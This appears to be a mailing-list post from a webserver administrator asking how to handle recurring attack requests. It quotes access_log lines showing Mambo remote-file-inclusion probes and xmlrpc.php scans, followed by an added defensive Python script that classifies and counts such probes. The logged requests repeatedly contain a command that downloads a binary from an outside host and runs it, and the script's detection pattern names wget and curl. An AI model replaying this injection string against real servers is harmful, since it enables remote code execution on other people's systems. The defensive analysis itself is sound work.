Hello,

I guess evil noise like that is a mundane encounter for any WWW webserver admin, and probably an unavoidable plague, as SPAM is for SMTP relays. Because I haven't administered a WWW servicing webserver yet, I have luckily missed such filth so far.

Of course these requests aren't serviced by our webserver, and mod_security dutifully sends them a 404; nevertheless they waste bandwidth, file system space for their logging, and processing resources.

On the other hand I'm hesitant to drop those source IP addresses by my packet filter, because I suspect them (if not spoofed) to originate from an ISP's dynamic IP pool, and I would thereby be blocking the next unlucky decent guy who happens to have been temporarily assigned such an abused IP address.

So I would like to ask you seasoned webserver admins: how best to handle these requests? Do you simply drop them, or do you redirect them to sites such as http://www.gulli.com/, or some CERT blacklist etc.? As for mod_security, what would a neat filter look like to counter or trick them? Is the setup of a honeypot that would draw attention from the webserver advisable, or is such in vain?

Here's an excerpt from our access_log of requests trying to wget and run some hostile code through our webserver. As these reappear on a regular basis, I assume that some attack kits that generate them are in widespread use.
203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 208
203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 207
203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 214
203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 212
203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 223
203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 218
203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 403 217
203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 403 219
203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 403 225
203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 222
203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 403 219
203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 219
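Added example (not from the post or from anyone on the list): a small Python triage script that parses access_log lines like the excerpt above and labels the two probe shapes it shows, a query value that is itself a remote URL followed by a fetch-and-run shell string, and POSTs to xmlrpc.php, then counts hits per source host so a decision about a given address can rest on what it actually sent. The label names, the regexes and the sample lines (adapted from the excerpt, plus one constructed benign request from 192.0.2.10) are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "request" status size
CLF_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
ABS_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)     # query value is itself a remote URL
SHELL_RE = re.compile(r'\b(?:wget|curl|fetch|chmod)\b')  # fetch-and-run markers; tune per site

def parse_clf(line):
    m = CLF_RE.match(line)
    return m.groupdict() if m else None  # None when the line does not parse

def query_params(target):
    """Yield (name, value) pairs of the query string, percent-decoded once."""
    # Split on '&' only: the probe's cmd value contains ';' and a nested '?'.
    for pair in unquote(target.partition('?')[2]).split('&'):
        name, _, value = pair.partition('=')
        yield name, value

def classify(method, target):
    """Label a request as one of the probe types in the excerpt, or None if benign."""
    if method == 'POST' and target.partition('?')[0].endswith('/xmlrpc.php'):
        return 'xmlrpc-probe'
    remote_include = shell = False
    for _name, value in query_params(target):
        remote_include |= bool(ABS_URL_RE.match(value))  # mosConfig_absolute_path=http://...
        shell |= bool(SHELL_RE.search(value))            # cmd=cd /tmp;wget ...;chmod ...
    if remote_include:
        return 'rfi-fetch-and-run' if shell else 'rfi-probe'
    return None

def summarize(lines):
    """Count labelled requests per source host; benign and unparsable lines are skipped."""
    per_host = defaultdict(Counter)
    for line in lines:
        rec = parse_clf(line)
        label = classify(rec['method'], rec['target']) if rec else None
        if label:
            per_host[rec['host']][label] += 1
    return {host: dict(counts) for host, counts in per_host.items()}

# Constructed sample lines, adapted from the excerpt in the post (first query shortened).
SAMPLE = [
    '203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&'
    'mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 214',
    '203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212',
    '192.0.2.10 - - [23/Feb/2006:04:00:00 +0100] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120',
]
```

Feed it your real access_log (`summarize(open('access_log'))`) and the per-host counts tell you whether an address is a one-off scanner or a repeat offender before you decide between a mod_security rule and a packet-filter drop.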